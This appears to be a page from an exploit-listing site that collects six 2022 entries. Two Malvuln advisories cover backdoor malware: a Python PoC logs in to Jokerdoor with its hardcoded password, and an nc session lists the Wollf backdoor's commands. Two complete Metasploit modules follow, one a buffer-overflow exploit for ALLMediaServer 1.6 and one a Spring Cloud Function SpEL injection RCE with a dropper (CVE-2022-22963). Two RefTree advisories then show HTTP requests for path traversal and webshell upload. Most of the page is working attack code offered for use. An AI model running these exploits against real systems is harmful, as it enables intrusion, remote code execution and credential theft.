Latest exploits :: CodePwn

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/a6437375fff871dff97dc91c8fd6259f.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Jokerdoor Vulnerability: Weak Hardcoded Credentials Family: Jokerdoor Type: PE32 MD5: a6437375fff871dff97dc91c8fd6259f Vuln ID: MVID-2022-0531 Dropped files: Random name "awup.exe" Disclosure: 04/02/2022 Description: The malware listens on TCP port 27374. The password "mathiasJ" is weak and hardcoded in the PE file. Failed authentication generates a "POPUP incorrect password..." message, using TELNET results in an error "PWDPerror reading password..." Using Nc64.exe utility results in a trailing line feed character "\n" after the supplied password. This causes the cmp statement check to fail even if the password is correct due to the "\n" character. 004BDA0C | 8B 45 EC | mov eax,dword ptr ss:[ebp-14] | [ebp-14]:" mathiasJ\n" 004BDA0F | 8B 15 0C AC 4D 00 | mov edx,dword ptr ds:[4DAC0C] | 004DAC0C:&"mathiasJ" 004041C7 | 39 D0 | cmp eax,edx | eax" mathiasJ\n", edx"mathiasJ" So we will need to write a custom client ourselves. The password must also be sent with no space and prefixed with "PWD" E.g. "PWDmathiasJ". Upon successful authentication we get a message e.g. "PWDconnected time, date Legends 2.1". Exploit/PoC: from socket import * import time MALWARE_HOST="x.x.x.x" PORT=27374 def chk_res(s): res="" while True: res += s.recv(512) break if "\0" in res or "\n" in res or res == "": break return res def doit(): s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) time.sleep(1) PAYLOAD="PWDmathiasJ" s.send(PAYLOAD) time.sleep(1) print(chk_res(s)) s.close() if __name__=="__main__": doit() print("Malvuln") Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/867c6b432ccd4aa51adc5e2722a4b144.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Wollf.h Vulnerability: Unauthenticated Remote Command Execution Description: The malware runs with SYSTEM integrity and listens on TCP port 7614. Third-party adversaries who can reach an infected host can run commands made available by the backdoor. Family: Wollf Type: PE32 MD5: 867c6b432ccd4aa51adc5e2722a4b144 Vuln ID: MVID-2022-0530 Dropped files: wrm.exe Disclosure: 04/02/2022 Exploit/PoC: c:\>nc64.exe x.x.x.x 7614 "Wollf Remote Manager" v1.6 Code by wollf, http://www.xfocus.org [DESKTOP-2C3IQHO@C:\WINDOWS\system32]#help DOS Switch to MS-DOS prompt DIR/LS/LIST Directory and file list CD Entry directory MD/MKDIR Make directory PWD Get current dirctory COPY/CP Copy file DEL/RM Delete directory/file REN/RENAME Rename file MOVE/MV Move file TYPE/CAT Type text file POPMSG Popup message box SYSINFO Get system information WHO/W Get current connections SHELL Execute command by system shell(cmd.exe) EXEC/RUN Execute file by windows API(WinExec) WS Windows list PS Process list KILL Kill process GET/GETFILE Download file from remote machine PUT/PUTFILE Upload file to remote machine WGET Get file from web server FGET Get file from ftp server FPUT Put file to ftp server TELNET Connect to other host FTPD Start ftp service TELNETD/TELD/EXPORT Start telnet service (export shell) REDIR Redirect tcp data from <Port> to <Dest_host:Dest_port> REDIR_STOP Stop redirect tcp data SNIFF Sniff ftp/smtp/pop3/http password what via ethernet SNIFF_STOP Stop ethernet sniffer KEYLOG Start keyboard record KEYLOG_STOP Stop keyboard record REBOOT Reboot windows SHUTDOWN Shutdown windows EXIT Close current connection QUIT Close all connection and abort service REMOVE Remove service VER/VERSION Version information HELP/H/? Show help message Type "HELP | MORE" for multipage display. Command "HELP" succeed. [DESKTOP-2C3IQHO@C:\WINDOWS\system32]# Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## # Author: Hejap Zairy # Date: 1.08.2022 # Exploit Prof # Proof and Exploit: #image:https://i.imgur.com/yLrRR2t.png #video:https://streamable.com/x4i50c require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'ALLMediaServer 1.6 Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in ALLMediaServer 1.6 The vulnerability is caused due to a boundary error within the handling of HTTP request. Thank you Saud Alenazi and 0xSaudi and Muhammad Al Ahmadi and all the friends in Tuwaiq i Love Tuwaiq }, 'License' => MSF_LICENSE, 'Author' => [ 'Hejap Zairy Al-Sharif', # Remote exploit and Metasploit module ], 'DefaultOptions' => { 'ExitFunction' => 'process', #none/process/thread/seh }, 'Platform' => 'win', 'Payload' => { 'BadChars' => '\x00\x0a\x0d\xff' }, 'Targets' => [ [ 'ALLMediaServer 1.6 / Windows 10 - English', { 'Ret' => 0x0040590B, # POP ESI # POP EBX # RET 'Offset' => 1072 } ], [ 'ALLMediaServer 1.6 / Windows XP SP3 - English', { 'Ret' => 0x0040590B, # POP ESI # POP EBX # RET 'Offset' => 1072 } ], [ 'ALLMediaServer 1.6 / Windows 7 SP1 - English', { 'Ret' => 0x0040590B, # POP ESI # POP EBX # RET 'Offset' => 1072 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Apr 1 2022', 'DefaultTarget' => 1)) register_options([Opt::RPORT(888)], self.class) end def exploit connect buffer = "" buffer << make_nops(target['Offset']) buffer << "\xeb\x06\x90\x90" buffer << "\x0B\x59\x40\x00" buffer << make_nops(100) buffer << payload.encoded buffer << make_nops(50) print_status("Sending payload ... \n Exploit MediaServer") sock.put(buffer) handler disconnect end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'Spring Cloud Function SpEL Injection', 'Description' => %q{ Spring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using an unsafe evaluation context with user-provided queries. By crafting a request to the application and setting the spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code execution. Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message. }, 'Author' => [ 'm09u3r', # vulnerability discovery 'hktalent', # github PoC 'Spencer McIntyre' ], 'References' => [ ['CVE', '2022-22963'], ['URL', 'https://github.com/hktalent/spring-spel-0day-poc'], ['URL', 'https://tanzu.vmware.com/security/cve-2022-22963'], ['URL', 'https://attackerkb.com/assessments/cda33728-908a-4394-9bd5-d4126557d225'] ], 'DisclosureDate' => '2022-03-29', 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => false, 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :linux_dropper } ] ], 'DefaultTarget' => 1, 'DefaultOptions' => { 'RPORT' => 8080, 'TARGETURI' => '/functionRouter' }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Base path', '/']) ]) end def check res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(datastore['TARGETURI']) ) return CheckCode::Unknown unless res # both vulnerable and patched servers respond with 500 and a JSON body with these keys return CheckCode::Safe unless res.code == 500 return CheckCode::Safe unless %w[timestamp path status error message].to_set.subset?(res.get_json_document&.keys&.to_set) # best we can do is detect that the service is running CheckCode::Detected end def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager end end def execute_command(cmd, _opts = {}) vprint_status("Executing command: #{cmd}") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(datastore['TARGETURI']), 'headers' => { 'spring.cloud.function.routing-expression' => "T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub("'", "''")}'})" } ) fail_with(Failure::Unreachable, 'Connection failed') if res.nil? fail_with(Failure::UnexpectedReply, 'The server did not respond with the expected 500 error') unless res.code == 500 end end </code></pre>

<pre><code>=============================================================================== title: IdeaRE RefTree Download Path Traversal product: IdeaRE RefTree < 2021.09.17 vulnerability type: Directory Traversal CVE ID: CVE-2022-27248 severity: Medium CVSSv3 score: 4.3 CVSSv3 vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N found: 2021-09-13 by: Savino Sisco <saviosisco@gmail.com> =============================================================================== [EXECUTIVE SUMMARY] RefTree is a web application made for managing complex real estate situations. Among other features, it offers the possibility for authenticated users to upload and download DWG (CAD drawings) files for buildings. During a penetration test activity, a "Directory Traversal" vulnerability was found on the download feature which allows to download arbitrary files with the "dwg" extension. The application actually checks that the filename ends with "dwg", so it's not possible to download files with other extensions. This vulnerability may also allow to steal NTLM hashes of the host system by supplying, as the download path, a UNC path pointing to an attacker controlled machine running a tool like Responder. [VULNERABLE VERSIONS] IdeaRE RefTree < 2021.09.17 [TECHNICAL DETAILS] It is possible to reproduce the issue following these steps: 1. Log into the application to get a valid session cookie 2. Use the API endpoint '/CaddemServiceJS/CaddemService.svc/rest/DownloadDwg' to download an arbitrary "dwg" file (UNC paths are accepted). Example of the request to the Download endpoint: POST /CaddemServiceJS/CaddemService.svc/rest/DownloadDwg HTTP/2 Host: [REDACTED] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json Content-Length: 111 Origin: https://[REDACTED] Referer: https://[REDACTED]/Reftreespace/ Cookie: ASP.NET_SessionId=dezu5r0zswyqk4dukwt5jt5n { "path": "C:\\Users\\Public\\test.dwg" } HTTP/2 200 OK Cache-Control: private Content-Type: application/json; charset=utf-8 Server: Microsoft-IIS/10.0 Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://[REDACTED] X-Powered-By: ASP.NET Date: Thu, 10 Oct 2021 11:21:32 GMT Content-Length: 241916 {"DownloadDwgResult":[BASE64_FILE_REDACTED]} [VULNERABILITY REFERENCE] The following CVE ID was allocated to track the vulnerabilities: CVE-2022-27248 [DISCLOSURE TIMELINE] 2021-09-13 Vulnerability disclosed to our customer and the vendor. Vendor acknowledged the issue. 2021-09-17 Vendor released a fix for the software. 2021-10-15 The vulnerability was rechecked in the newer version to confirm that is was indeed fixed. 2022-03-15 Researcher requested to publicly disclose the issue; public coordinated disclosure. [RESOLUTION] Update the software to a version >= 2021.09.17 [CONTACT DETAILS] Savino Sisco <saviosisco@gmail.com> https://www.linkedin.com/in/savino-sisco/ </code></pre>

<pre><code>=============================================================================== title: IdeaRE RefTree Remote Code Execution product: IdeaRE RefTree < 2021.09.17 vulnerability type: Unrestricted File Upload CVE ID: CVE-2022-27249 severity: High CVSSv3 score: 8.8 CVSSv3 vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H found: 2021-09-13 by: Savino Sisco saviosisco@gmail.com =============================================================================== [EXECUTIVE SUMMARY] RefTree is a web application made for managing complex real estate situations. Among other features, it offers the possibility for authenticated users to upload and download DWG (CAD drawings) files for buildings. During a penetration test activity, an "Unrestricted File Upload" vulnerability was found which leverages the upload feature to upload a file anywhere on the target system. By uploading a malicious web page, like an aspx web shell, to the server's web root it is possible to achive code execution by just navigating to the malicious page with a web browser. [VULNERABLE VERSIONS] IdeaRE RefTree < 2021.09.17 [TECHNICAL DETAILS] It is possible to reproduce the issue following these steps: 1. Log into the application to get a valid session cookie 2. Get a valid "ObjId" from the application (the ID of a building to associate the file to) 3. Use the API endpoint '/CaddemServiceJS/CaddemService.svc/rest/UploadDwg' to upload a file on the target system, for example a web shell in the server's web root 4. Navigate to the new page with a web browser to trigger code execution Example of the HTTP request to the Upload endpoint: POST /CaddemServiceJS/CaddemService.svc/rest/UploadDwg HTTP/2 Host: [REDACTED] Cookie: ASP.NET_SessionId=b1125gke23enpul1ukeu1ouy User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json Content-Length: 2211 Origin: https://[REDACTED] Referer: https://[REDACTED]/Reftreespace/ { "FileContent": "[BASE64_PAYLOAD]", "DwgName": "C:\\inetpub\\wwwroot\\webshell.aspx", "UploadType": "WorkingCopy", "ObjId": 4774726, "ObjType": 5, "UpdateState": true, "DwgOp": 23 } HTTP/2 200 OK Cache-Control: private Content-Type: application/json; charset=utf-8 Server: Microsoft-IIS/10.0 Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: [REDACTED] X-Powered-By: ASP.NET Date: Fri, 10 Sep 2021 15:00:53 GMT Content-Length: 24 {"UploadDwgResult":null} [VULNERABILITY REFERENCE] The following CVE ID was allocated to track the vulnerabilities: CVE-2022-27249 [DISCLOSURE TIMELINE] 2021-09-13 Vulnerability disclosed to our customer and the vendor. Vendor acknowledged the issue. 2021-09-17 Vendor released a fix for the software. 2021-10-15 The vulnerability was rechecked in the newer version to confirm that is was indeed fixed. 2022-03-15 Researcher requested to publicly disclose the issue; public coordinated disclosure. [RESOLUTION] Update the software to a version >= 2021.09.17 Savino Sisco <saviosisco@gmail.com> https://www.linkedin.com/in/savino-sisco/ </code></pre>